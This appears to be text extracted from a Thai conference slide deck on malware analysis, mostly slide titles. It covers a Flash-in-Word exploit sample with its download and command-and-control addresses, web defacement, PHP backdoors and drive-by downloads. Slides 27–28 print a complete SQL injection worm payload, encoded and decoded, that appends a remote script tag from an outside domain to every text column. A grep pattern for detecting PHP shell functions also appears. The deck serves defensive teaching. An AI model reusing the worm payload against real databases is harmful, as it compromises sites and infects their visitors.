advanced malware analysis

“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”

www.cdicconference.com

1

ช ำแหละโปรแกรมไม่พงึประสงค์ ด้วยเทคนิคเหนือเมฆ

อ. ประธาน พงศ์ทิพย์ฤกษ์SANS GIAC GPEN, eCPPT, ECSA, CEH, CPTS, CIW Security Analyst, CWNA, CWSP, Security+, ITIL-F

Section Manager, Senior Information Security Consultant

ACIS Professional Center

http://www.cdicconference.com/

2

Let’s Party Rock

Next Generation for Malware

Malware Analysis

Web Based Malware

Back to the Past

Back to the Future

Lab Challenge

2



3

Next Generation of Malware


4

Old Malware fashion

Executable file

Packer, Crypter => FUD just 1 Week !!

Spyware / Adware

Rogue Security Software

Virus / Worm

USB Autorun

4

5

Antivirus Detected

5

Gotcha !!

6

Virustotal

6

7

Virustotal – One Week later

7

8

Anubis: Analyzing Binary File

8

9

Latest Malware fashion

MS Office+Flash Player

PDF Reader

Mobile Application

Social Network Application

Web Browser Toolbar

Web based Malware

9

10

Bypassing Antivirus

10

Ninja Techniques

11

Malware Analysis

11

12

CVE-2012-0754: SWF in DOC

“Iran’s Oil and Nuclear Situation.doc” Contains flash instructing it to download and

Parse a malformed MP4.

OS Affect Adobe Flash Player before 10.3.183.15 and 11.x

Before 11.1.102.62 on Windows, Mac OS X, Linux

And Solaris

Mobile Affect Adobe Flash Player before 11.1.111.6 on

Android 2.x and 3.x and before 11.1.115.6 on

Android 4.x

12

13

Document Analysis

Decompiled Flash from file This.MyNS.play(“http://208.115.230.76/test.mp4”);

Whois – 208.115.230.76 208.115.230.76

76-230-115-208.static.reverse.lstn.net

Host reachable, 77 ms. average, 2 of 4 pings lost

208.115.192.0 - 208.115.255.255

Limestone Networks, Inc.

400 S. Akard Street

Suite 200

Dallas

TX

75202

United States

13

14

Process Monitor network log

14

15

Process Monitor network log

15

16

Traffic and C&C (us.exe)

16

17

Virus Analysis – us.exe

17

18

Target Analysis

Whois – 199.192.156.134 199.192.156.134

Host reachable, 89 ms. average

199.192.152.0 - 199.192.159.255

VPS21 LTD

38958 S FREMONT BLVD

FREMONT

CA

94536

United States

zou, jinhe

+1-408-205-7550

18



19

Web Based Malware


20

Back to the Past

20

21

Web Defacement

21

22

Zone-H

22

23

Ddos Tool

23

24

Hack 4 Fun and Profit

24

25

Back to the Future

25

26

About My Memory

2008 Oishi website was hacked without defacement

Kaspersky AV alert for “A little javascript file”

2009 SQL injection worms on MSSQL

Affect many Bank on Thailand

2010 Google and Firefox alert for malware website

Obfuscation JS to bypass AV

2011 Many website was blocked by Google Malware

26

27

SQL Injection Worms

27

';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--

28

SQL Injection Worms

28

';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(D E C L A R E @ T v a r c h a r ( 2 5 5 ) , @ C v a r c h a r ( 2 5 5 ) D E C L A R E T a b l e _ C u r s o r C U R S O R F O R s e l e c t a . n a m e , b . n a m e f r o m s y s o b j e c t s a , s y s c o l u m n s b w h e r e a . i d = b . i d a n d a . x t y p e = ' u ' a n d ( b . x t y p e = 9 9 o r b . x t y p e = 3 5 o r b . x t y p e = 2 3 1 o r b . x t y p e = 1 6 7 ) O P E N T a b l e _ C u r s o r F E T C H N E X T F R O M T a b l e _ C u r s o r I N T O @ T , @ C W H I L E ( @ @ F E T C H _ S T A T U S = 0 ) B E G I N e x e c ( ' u p d a t e [ ' + @ T + ' ] s e t [ ' + @ C + ' ] = r t r i m ( c o n v e r t ( v a r c h a r , [ ' + @ C + ' ] ) ) + ' ' < s c r i p t s r c = h t t p : / / w w w . f e n g n i m a . c n / k . j s > < / s c r i p t > ' ' ' ) F E T C H N E X T F R O M T a b l e _ C u r s o r I N T O @ T , @ C E N D C L O S E T a b l e _ C u r s o r D E A L L O C A T E T a b l e _ C u r s o r undefined AS%20NVARCHAR(4000));EXEC(@S);--

29

Web Application Backdoor

29

30

Web Application Backdoor -FUD

30

31

Redbull.php (PHP Backdoor)

31

32

Insert Malicious JS into config.inc.php

32

33

Crimepack Exploit Kit

33

34

Crimeware Exploit Kit

34

35

Drive-By Download

34

Web Server

Malware Server

Web Server

Visit Malicious Website

Malicious JS execute

Redirect to Malware Server

Exploit Browser / Flash PlayerReverse Shell to Attacker

36

Google Malware Alert

35

37

Google Diagnostic

36

38

http://www.stopbadware.org/home/reviewinfo

37

39

http://sitecheck.sucuri.net/scanner

38

40

http://sucuri.net/malware/malware-entry-mwhta7

39

41

http://sucuri.net/malware/malware-entry-mwhta7

40

42

http://www.urlvoid.com

41

43

Detect Webserver Backdoor

42

Manual Source review

NeoPI – Neohapsis

PHP Shell Scanner

http://25yearsofprogramming.com/php/findmaliciouscode.htm

grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(”

/var/www/

44

PHP Shell Scanner

43

45

Undetectable #1

44

46

Undetectable #2

45

47

JS De-Obfuscate Tool

46

Google Chrome Developer Tools Firebug (Firefox’s plugin) JSDebug (Firefox’s plugin) Javascript Deobfuscator (Firefox’s plugin) Malzilla Rhino SpiderMonkey

48

Simple JS Obfuscate

47

49

Simple JS Obfuscate

48



50

Lab Challenge


51 50

Be Safe



advanced malware analysis

Technology